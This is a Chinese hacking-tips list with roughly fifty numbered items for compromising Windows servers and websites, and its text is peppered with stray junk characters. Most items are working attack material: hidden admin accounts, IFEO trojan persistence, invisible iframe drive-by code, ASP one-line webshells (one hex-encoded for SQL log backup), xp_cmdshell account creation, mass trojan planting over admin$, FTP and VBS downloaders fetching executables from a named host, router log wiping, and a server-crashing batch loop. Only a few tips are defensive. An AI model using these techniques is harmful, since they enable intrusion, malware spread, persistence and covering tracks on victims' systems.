1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,5 }( _, i0 _+ \! r+ f* Y# m
cacls C:\windows\system32 /G hqw20:R
/ J9 D: E+ u8 l' \1 x5 t+ w$ E5 |思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
$ x! O! _# D v6 g- F7 ^0 w恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
& C& S$ x. J. K* h2 T. j) | R' v6 x" o5 D. D8 Q( h
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% s7 l# \, ~7 E( j: I8 S0 r: u+ J6 O+ C3 v8 w. f) h
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
7 _5 J1 Q: U2 K, ~
) X- c- {: R: ^& t! a& b; B4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
8 h# R% \% y1 O! P& ~0 c% ?# R; }& B" H! A9 Z
5、利用INF文件来修改注册表' G7 K& m& I8 Y7 O' e: _9 A0 W6 s
[Version]9 x( z! m3 j T4 V
Signature="$CHICAGO$" K: s) ^4 S( r- q9 Y0 ]1 {4 K
[Defaultinstall]
0 P1 K ~7 Y7 k0 @6 M0 j kaddREG=Ating& N6 V7 p+ u( t4 ~9 m
[Ating] k- v7 f7 `/ @9 z5 q5 _
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
" `! I: j+ g! Z G: v以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
8 u+ V- H& r6 O* r( c, Wrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径$ Z% @- I( r. F- I* i2 J
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU$ u. x9 h+ C" |
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU0 C" ~$ T% C( t2 w' N8 l h* ]
HKEY_CURRENT_CONFIG 简写为 HKCC
, X: R* n8 L/ \0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值. r3 U- s0 L' M
"1"这里代表是写入或删除注册表键值中的具体数据
/ S% p5 \+ Z6 h: A+ O, R: A. v9 d2 w# c) B5 o
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
/ w6 n+ t; O! ~% H) v) i2 r: L多了一步就是在防火墙里添加个端口,然后导出其键值
" Z6 \. ?8 M3 r/ |[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]8 h7 U% p) }3 x0 ^) X
5 ~. O% O8 H R6 L5 V7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽1 b7 [' R% I) z8 s4 S, {
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。9 E9 G) e$ [5 y7 o7 u* Z) k2 ]/ K
+ h7 u% p3 y) L% [5 y* o
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
9 i7 Z9 L( }& A; K( _1 k2 n% C, W( ^9 a8 [! q
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,) F9 X/ C7 X7 \9 ]4 V- T7 ]/ H: Q
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
# a* N1 u+ `1 x! O
. E. _( S: k: O- C: X+ q! W/ J10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
9 _/ W9 F) {. T" `0 D C+ G& E' P( E5 x
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 Y6 p# C( `/ `& [2 i5 ^用法:xsniff –pass –hide –log pass.txt7 S T# }5 t6 t) S& r. Z; i' B
$ a, l9 ^) h+ `* Z( t$ N& Y8 p& ^12、google搜索的艺术
5 w( L/ b# S9 ^& N% [7 j搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
* U# }% [# {8 w" a0 n, k! f. z( m8 S或“字符串的语法错误”可以找到很多sql注入漏洞。
5 b0 s1 Q& l9 M' \7 U3 p( w+ X5 Z2 \+ v" { X9 J6 j* c
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
& e7 {& z/ L9 I3 _
6 W7 x$ x& A* E* Q14、cmd中输入 nc –vv –l –p 1987
. L" ^- t2 [$ j3 A) I) N, f+ Y做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃4 B% y; b) b0 C9 Y' }9 s+ x8 ~
4 h5 c& `8 p1 r* m15、制作T++木马,先写个ating.hta文件,内容为3 z! Q e) C; G( p. _4 c$ i1 i
<script language="VBScript">/ h8 z" U4 X( D& ]% k. K
set wshshell=createobject ("wscript.shell" )
( ^5 s; f; n: P. }; Ja=wshshell.run("你马的名称",1)
9 _9 M* Y" ], A: p* |+ w( Mwindow.close
" m8 n6 j$ j" u, p3 s( z% A</script>
! m# J, W2 n/ F' L再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。* u- ~& K- @: k% ]# F; P, G
0 }$ U: ?7 T6 W, K
16、搜索栏里输入
9 T; ?( n4 c! E+ S7 A/ I关键字%'and 1=1 and '%'='
# ^ ]2 L2 Q8 d, `0 i关键字%'and 1=2 and '%'='6 w, |& A0 x" Z: E Y% Q+ `
比较不同处 可以作为注入的特征字符0 K }# e2 O5 `# }
; S$ D( @, X! G% {% d6 r5 }! |17、挂马代码<html>( H+ \ [. z& ?: M0 ~1 L, q
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
" f; r! v) P1 K</html>
8 G- |! M5 `- d
7 R% ]: T# ~# L4 `, O7 g18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
) W6 H" I6 l9 r- @net localgroup administrators还是可以看出Guest是管理员来。
( R y% Z$ ?# M5 a4 Q, q& R0 t% d, N o) W& x$ X+ c
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等3 z5 S# O) @, [% j8 [
用法: 安装: instsrv.exe 服务名称 路径
( c- L; E' E9 D# _/ p卸载: instsrv.exe 服务名称 REMOVE
' N$ r# \5 a! J/ M2 f- c
# ^3 x! |+ Z2 ~7 ?) \
+ K& U' P/ p3 T0 c( H21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
7 z& O1 O2 N1 w2 ]/ U8 g1 ^# I不能注入时要第一时间想到%5c暴库。
3 a1 b4 J; W* q8 B ?4 X
" u2 Z1 `# }4 h4 v22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
- G0 w, N* j# C7 ]8 [( ^: a3 B/ @( t
23、缺少xp_cmdshell时" v( I* e3 ]) c' t
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
" X* [8 K3 A" L假如恢复不成功,可以尝试直接加用户(针对开3389的)
* u/ s0 F, [( `0 l3 J5 K# E9 {+ rdeclare @o int
$ d8 [* Q% B% D- aexec sp_oacreate 'wscript.shell',@o out" G @: b) }2 ?5 I5 M3 z
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
! a3 L! u) v& k6 I$ p, f/ R: n% ~8 y) J6 K) ?/ G6 ]
24.批量种植木马.bat
, Z K" F. y& S9 q* V {for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中- V( R$ m# ]; n% l, o1 K U
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间1 G- K. U& Z, D6 {
扫描地址.txt里每个主机名一行 用\\开头6 B. R9 T& O; o. [/ B
: B1 I U; M- ^, t25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
: I; a- E. d6 l, z' w2 U, D9 O
+ G/ ^$ {: B( `, P4 b! }26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 q* U( N" k- T7 p, S4 S将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
, U, |8 W" I3 U* T.cer 等后缀的文件夹下都可以运行任何后缀的asp木马+ \7 [4 X* h7 O6 e7 ~; _% \7 r( j
1 F* Z" D8 z9 E0 l) W
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
0 z9 \/ q" \8 K; u. H然后用#clear logg和#clear line vty *删除日志
" j* c1 `/ u: ?* m1 L; e( t
: B% P/ y9 i2 J9 w28、电脑坏了省去重新安装系统的方法
, @; |/ s: Z4 W! H: G/ p纯dos下执行,
( i# ]9 J" g6 A$ B$ k5 g# u2 cxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config& z, P& l( h# k1 y1 x/ u2 e
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
7 {* T$ g G* D* {- G
G' j8 Y+ `" o: @29、解决TCP/IP筛选 在注册表里有三处,分别是:9 a7 Z6 f% M' R
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip- Z4 I0 e; m7 Z$ f- _4 M6 P
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
: x) \5 X8 C4 R1 i8 w! |3 NHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- H4 Q. F& G! U; b
分别用* m5 t/ z( R% g k5 J
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 L8 t% g; _/ O& T' r3 X! x; [' Q
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( h0 R8 Z& r' J) \
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 p& ]+ ^: r& j# B3 R; C命令来导出注册表项& s: x/ V' s/ \( V8 \* Q' c
然后把三个文件里的EnableSecurityFilters"=dword:00000001,- X s/ q& c3 m$ D2 {
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用, U- O" K, v; K5 B( m
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
- P( v1 D) y. S6 L) Z8 K6 `3 C0 M& A6 i5 e& r( X
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* C% g5 g* }# v5 r1 lSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3. s5 {5 B# Y) _. M$ l2 I
3 u1 h0 `% d" |5 g2 t0 T8 y
31、全手工打造开3389工具
: v' |: }, |3 m6 k/ p9 `, a打开记事本,编辑内容如下:4 z" O6 ?! p9 W- _# F, k% y
echo [Components] > c:\sql
' p- \0 f7 c2 \- wecho TSEnable = on >> c:\sql
& K' U+ Y, R5 W. v8 [* `% V. Nsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q W; o' s3 O8 ]' m2 D5 U3 w
编辑好后存为BAT文件,上传至肉鸡,执行$ U$ B( c3 B. k" g& p" \2 e% D
( v0 @% k5 n/ j1 s/ U" `3 B. q2 I: c. {32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马* A: S' @ n. H: E" v3 r3 g! j
" h4 k7 _9 W s+ Y4 v; W* S
33、让服务器重启
& U8 Q5 F; ^8 B/ M/ ^! J+ t) y写个bat死循环:4 p- F! I, h h6 c
@echo off
% Z0 [' \% N" E( B- k8 A; `" f* c:loop1
" F4 x% o6 a& S4 c* ?cls& {1 W7 ] c. S: R$ L# d
start cmd.exe4 h2 b. w' ~5 n
goto loop1
/ g/ ^% y5 D9 U" _ o7 W# t) J保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
, Q% m: h, Y' o8 ~9 h: w
+ S- e0 p/ z8 O6 a* c; _/ W/ |34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
0 Q e. o8 W1 M8 ~ J0 L6 S@echo off o1 X, Q0 O2 S
date /t >c:/3389.txt
7 }, _# b! }! [9 ?" h) ctime /t >>c:/3389.txt
" v' k2 n+ i# T6 @* tattrib +s +h c:/3389.bat
/ v# T# P: H3 B2 J1 c, i L+ Y1 }attrib +s +h c:/3389.txt
7 X, e" V- B; S$ B Tnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt. ^2 w$ t) W& O& c3 d" X6 g: c
并保存为3389.bat
2 ?5 x$ z, B( x4 j: A6 i0 O: [2 W打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号5 x1 w# t* @9 h: Z9 x
/ o5 C' J( e: \! V
35、有时候提不了权限的话,试试这个命令,在命令行里输入:- F* ?" S- R0 ^
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)7 w' f- r& r6 @5 o& i6 L5 {
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
- Z' {, X6 B, U: ?$ V& I R* ^3 d0 B( E6 h. [* z6 N
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
4 w2 O4 W7 S" Z& O5 qecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址/ t* q3 p+ F/ K: G
echo 你的FTP账号 >>c:\1.bat //输入账号
% k* [" O: y( I3 ~6 c" G- E2 iecho 你的FTP密码 >>c:\1.bat //输入密码& R7 |( F8 ~3 F: m% q
echo bin >>c:\1.bat //登入
% _, R5 _3 y6 {& eecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么/ x) m! Z, f% K# ?1 F* H! z {
echo bye >>c:\1.bat //退出
0 f6 S3 U# M M% q然后执行ftp -s:c:\1.bat即可
' Z' \& y q& J$ s& F
5 i+ _% o- G! E: e( x. R9 C) O37、修改注册表开3389两法
. s/ t" a1 c3 F; `' ?" Y2 m(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表8 b8 S S4 o1 K9 T
echo Windows Registry Editor Version 5.00 >>3389.reg
1 \. d& W7 d4 q! g$ j5 vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
& ^# o3 M8 q$ _# ?0 x! Oecho "Enabled"="0" >>3389.reg
: `. `) y/ D( S( [2 xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows( g( f& I1 n, S, b
NT\CurrentVersion\Winlogon] >>3389.reg* ^% B; H K2 L1 G/ `
echo "ShutdownWithoutLogon"="0" >>3389.reg
$ c; Q% C+ o/ mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
& U# \) R: z1 g3 P>>3389.reg {. D( a+ y, m* x" {8 P
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg" v2 T* k/ F9 `! l) b* N& P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]7 f$ Q* l i0 O! {% @- O
>>3389.reg
$ D3 h2 c9 _: J: iecho "TSEnabled"=dword:00000001 >>3389.reg
1 p# n3 `# w0 {+ N0 k. z7 |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg" y8 b( Z! y0 L/ i
echo "Start"=dword:00000002 >>3389.reg6 K1 ~4 S: f( R) `$ ~6 V4 ^. @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
1 j) v4 Y& P$ f' v1 H8 u% X @9 i>>3389.reg
7 c! V/ d8 N7 J5 m. vecho "Start"=dword:00000002 >>3389.reg
" z |3 J' A8 J) {7 \echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg" x: |4 a% I S* K$ V ~
echo "Hotkey"="1" >>3389.reg
- \7 x, S& G0 I i, ^$ @) i" uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 u) w; O9 i7 D; m# m
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
, Q7 y7 V/ u6 r M6 k* P+ cecho "PortNumber"=dword:00000D3D >>3389.reg, L! \' b' h) G* P( \ S/ Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- W3 x3 X1 O, C8 k/ OServer\WinStations\RDP-Tcp] >>3389.reg
- ?$ D4 B2 V5 `5 o4 aecho "PortNumber"=dword:00000D3D >>3389.reg9 p" Z0 b0 o# {0 Z: Y0 W
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
2 K0 |- ], D& s(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)4 K0 T' G* H4 J. I
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效3 n+ x) E$ D# ~9 e6 q
(2)winxp和win2003终端开启
: ~/ A3 Y2 ^- Z; D1 F: K用以下ECHO代码写一个REG文件:
, j& V0 y' w/ C$ Y$ pecho Windows Registry Editor Version 5.00>>3389.reg
8 ]" A ?9 @ ~0 techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. C% o7 {( X d# @9 Y% D* Y' e! m# Z7 F
Server]>>3389.reg* l* c2 ?( p" F
echo "fDenyTSConnections"=dword:00000000>>3389.reg
+ m2 I( B8 K5 `0 }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 v9 f7 L9 R( w. c0 q" o1 `
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
0 `! H' M4 E, u, @echo "PortNumber"=dword:00000d3d>>3389.reg/ z/ h. E8 n0 _% I7 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; \& R" y6 I9 d
Server\WinStations\RDP-Tcp]>>3389.reg
7 o# P" Y" a( \3 l* f/ K+ I* ~echo "PortNumber"=dword:00000d3d>>3389.reg. P C) `( B. W4 C
然后regedit /s 3389.reg del 3389.reg6 A- D; b& C8 B) o* F* x
XP下不论开终端还是改终端端口都不需重启5 p" q1 Q5 H% v# b
4 D3 i2 s, U3 H# t( o2 K/ }38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
: x% r! D- u2 q# }3 `用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'8 \- g0 @4 a3 ~2 P0 S- [: C5 F8 n
+ M0 f3 ^$ l# ?. z5 ], @9 u
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!" ~: D7 |# G0 h' }
(1)数据库文件名应复杂并要有特殊字符+ M. [/ R2 g8 t- T1 ^. `2 F* F
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源' h9 [0 x- J3 c! o
将conn.asp文档中的
3 J4 o$ _: a5 YDBPath = Server.MapPath("数据库.mdb")0 L0 G. _) U. r( a% e, ]
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath. N) M! ~4 A1 ?4 e8 ?/ _) e+ y
: _8 G; h/ O. d; D修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置" A% U- z X/ w, X& K
(3)不放在WEB目录里. ]) i2 M+ Z, e
4 b; W( @# c, R& J, K40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
% [+ j2 ?1 B* U& X ^可以写两个bat文件, ?* B) N k- p% N
@echo off4 N7 e+ e! Y6 k* J- l) _$ C
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
( j: L* V$ a. R' G9 U) x@del c:\winnt\system32\query.exe
& h# W9 t2 Z {$ D@del %SYSTEMROOT%\system32\dllcache\query.exe! f" v8 r. J3 O5 t3 d+ B( z
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
8 H+ p; ^4 e- b% h1 d7 ? e' L+ I! U# \* }! a2 t
@echo off
3 b/ B# J% i& R* ]: [; @@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: A7 f2 T- t) G3 \( i1 b9 |@del c:\winnt\system32\tsadmin.exe
: n3 t, a, G) G$ J9 _8 u@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex$ ?, I9 z d: I" e
' z+ V+ j; h3 ~
41、映射对方盘符 S# |# j* U1 F& d6 W/ d2 L. m
telnet到他的机器上,# W" Z# h( m6 }1 w3 d1 m3 e
net share 查看有没有默认共享 如果没有,那么就接着运行
6 h, }# H# C7 gnet share c$=c:
6 e4 V6 Y0 _, T d( s) Mnet share现在有c$: Q8 d) v1 `; ^4 F' b
在自己的机器上运行
9 U% M$ {* u7 h, m) hnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 ~& E7 w8 _5 g' ^- S' A/ Y8 W2 ^: f) D
( V. A' K: y: g# w! v8 Q42、一些很有用的老知识
* H6 Z4 `2 z# q/ Xtype c:\boot.ini ( 查看系统版本 )
]' ~* R6 O7 H c% C$ rnet start (查看已经启动的服务)
/ F$ B8 p- G+ v8 nquery user ( 查看当前终端连接 )
! V* f# Q/ R* C% m/ } onet user ( 查看当前用户 )
& Q: D) P8 K; E3 tnet user 用户 密码/add ( 建立账号 )
( a& d. y7 P: x( znet localgroup administrators 用户 /add (提升某用户为管理员)
+ e3 c X; B6 g! c- w3 Bipconfig -all ( 查看IP什么的 )
~: h+ g2 p' k6 ~netstat -an ( 查看当前网络状态 )
* T; Z2 x- K0 c2 S3 B2 ]8 {, T0 x/ G% Rfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
: M% M& u# C& C克隆时Administrator对应1F4" [1 ^( p& h- U y4 B
guest对应1F5# Y) f$ U: ?# o$ L- J" _$ m
tsinternetuser对应3E8
/ M d2 c* r' U, U: [8 |& W: K/ X9 N& ]$ F
43、如果对方没开3389,但是装了Remote Administrator Service7 V1 \2 X( R4 m
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接7 R p9 L& j7 v' D
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
0 r" Z% L4 o+ a3 o0 D$ R先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
- G/ y; y. k* {5 X4 H: O- w/ z) O
$ M7 H9 |# K" N4 t7 e& q44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)* L& x( \" t; U" y" c/ d' Z
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
3 U- m; @* {" O" L- S8 n( H' A1 ^. M6 Z5 `
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)* G; ?& |+ W& j
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open" c* U U, p- {- }/ [& m
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =; {' c* S B4 `5 J& D
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =; {: c `0 s# p8 z6 [' n+ w
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
) y1 ?7 O8 T# s1 ~5 ~(这是完整的一句话,其中没有换行符)1 C' D3 T& o+ ^+ o$ m; y% x
然后下载:. i3 n4 w$ o. T* d- N
cscript down.vbs http://www.hack520.org/hack.exe hack.exe; ?3 [: T1 i }! q; G
& Y: ~/ |( o# A/ s7 a! l% m46、一句话木马成功依赖于两个条件:
5 [2 }* p- X9 V$ Q% ~1、服务端没有禁止adodb.Stream或FSO组件$ h) {; b. O2 w' n9 J2 v5 Q; v
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。: }5 m6 R( I4 u/ f9 t7 y/ e
7 Q D$ w: U' P47、利用DB_OWNER权限进行手工备份一句话木马的代码:
) Y: T# Q+ e, G" X# L$ L& f;alter database utsz set RECOVERY FULL--
4 q G2 r7 _# c;create table cmd (a image)--& \. T' O9 }, [/ I8 l$ P. M
;backup log utsz to disk = 'D:\cmd' with init--+ T: G, Z. O5 O1 c% ?: F
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--# I4 f% A3 s3 C& A M
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--4 D3 y" e$ b: ]
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
& }, ?4 m& L7 W/ E) C8 D
) k S: X5 _' r48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
7 R: |, C j7 X L
& X4 A, f3 E) y; I用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
% j; `! Y) h3 Z0 \/ D所有会话用 'all'。( H2 Q, I- b4 g3 h6 @0 @: G
-s sessionid 列出会话的信息。, o5 S ^7 _) e5 p, y4 k
-k sessionid 终止会话。
# C; n' E: a% ], O-m sessionid 发送消息到会话。: g6 }4 _! j( |. L4 n, J
Q- V% w4 W* v6 t3 L A/ R3 h, |
config 配置 telnet 服务器参数。
. F. s& F6 {; h+ X
! K: N6 s0 e1 X8 ^8 D) B! bcommon_options 为:3 \2 W- i! R8 f& Z* A+ Z8 [4 U
-u user 指定要使用其凭据的用户5 W3 V% `2 I; }8 p
-p password 用户密码& a. ~3 [* A0 `5 {( s7 n% z
- R5 t0 K. ]; o0 {1 y3 D% `config_options 为:' d/ K+ @" ]3 d z: ^8 ]/ C& H( ]; y
dom = domain 设定用户的默认域& F! }4 @# X1 }: P( w3 c9 O
ctrlakeymap = yes|no 设定 ALT 键的映射
0 e! q( d1 D+ `# ~, V- U: a+ Xtimeout = hh:mm:ss 设定空闲会话超时值- s( |/ [2 _1 h" a3 ^$ x8 J
timeoutactive = yes|no 启用空闲会话。
# \: ]8 J5 T V" p) E' m1 l6 j9 ymaxfail = attempts 设定断开前失败的登录企图数。
{: y$ R0 t( i" Smaxconn = connections 设定最大连接数。
8 }: o3 T" H) G9 ~port = number 设定 telnet 端口。
! H6 C% R9 _* Rsec = [+/-]NTLM [+/-]passwd
9 D; Z2 p- Y5 g: I" V% |/ O设定身份验证机构
$ p9 ?! S- h6 f" G Sfname = file 指定审计文件名。
/ ?( g ?& E" ?, m+ e) jfsize = size 指定审计文件的最大尺寸(MB)。
7 [" [4 f" o# h; xmode = console|stream 指定操作模式。" V' A# z; g! Q5 w) o, o
auditlocation = eventlog|file|both) ?4 U( o2 a* H0 l/ g5 e2 n; Q
指定记录地点8 [% u" l+ l% }. ]3 x8 _& Z _6 b, l
audit = [+/-]user [+/-]fail [+/-]admin
% m3 b! j4 D2 k; V* q# y! G7 q/ I3 G) K6 X e+ L
49、例如:在IE上访问:
! q( J" G* P: M4 @: Nwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/; x" B2 p5 `! B6 l/ _. N2 F
hack.txt里面的代码是:
( A9 C* l4 C1 `0 H+ i/ {<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
& |9 X# K4 |8 n4 v把这个hack.txt发到你空间就可以了!
, G7 X/ Y0 V2 |这个可以利用来做网马哦!$ L% r' ] L) J- k$ a
3 b( B: ?: \- ]! w; x7 ?50、autorun的病毒可以通过手动限制!. ^% _! d# M9 K, V( R7 L1 w3 G3 X
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
1 b. c$ }! M* c8 K* h2,打开盘符用右键打开!切忌双击盘符~& J4 Z: x d% \! J( X0 g
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
3 g5 }, O2 h$ `. A( r) k H4 [5 d' r+ b* ]# P% C) r7 N' E
51、log备份时的一句话木马:
4 G9 U3 @# _1 [( g2 ~' `# `a).<%%25Execute(request("go"))%%25>/ b/ k4 e4 H# [5 l# z _
b).<%Execute(request("go"))%>
+ k; E. E+ i5 A& J9 F7 q& uc).%><%execute request("go")%><%
m Y- F! x, \; C7 x/ Gd).<script language=VBScript runat=server>execute request("sb")</Script>) E8 S+ I% z9 K
e).<%25Execute(request("l"))%25>
1 \$ I9 O# }; }0 `9 M0 }3 Vf).<%if request("cmd")<>"" then execute request("pass")%>
2 v0 O& m" A. G7 o) {4 s, c
. m7 Z; {) Q) [6 ~- F52、at "12:17" /interactive cmd& @0 L! p3 e& O; D' o- r
执行后可以用AT命令查看新加的任务1 \2 t7 u" C& @2 _# S8 q4 H
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
